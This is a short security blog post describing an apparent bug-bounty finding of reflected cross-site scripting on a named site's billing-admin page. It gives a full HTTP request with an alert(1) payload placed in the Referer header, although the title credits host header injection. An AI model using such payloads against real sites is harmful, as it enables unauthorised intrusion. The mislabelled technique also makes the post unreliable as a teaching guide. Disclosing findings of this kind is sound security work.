XSS found using host header injection ~ Davinder Tutorials

Wednesday, April 22, 2020

XSS found using host header injection

April 22, 2020 Davinder

This vulnerability arise when you give any input to the host parameter and it may reflect back .

Impact

An attacker can use the vulnerability to construct a request that, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

Real World Example:

Path : /billing-admin/profile/subscription/?l=de
Payload : c5obc'+alert(1)+'p7yd5
Steps to reproduce :
Request Header :
GET /billing-admin/profile/subscription/?l=de HTTP/1.1
Host: www.semrush.com
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=c5obc'+alert(1)+'p7yd5
Overview :
The payload c5obc'+alert(1)+'p7yd5 was submitted in the Referer HTTP header. Payload is copied from a request and echoed into the application's immediate response in an unsafe way.

In the above example the payload reflect back in the response causing the rise of the vulnerability.

bounty / bug / Bug Bounty / HAcking / hacks / Host Header Injection / how can i become a computer hacker / HTTP Cache Poisoning

No Comments

Davinder Tutorials

This blog is all about Cyber Security and IT

Wednesday, April 22, 2020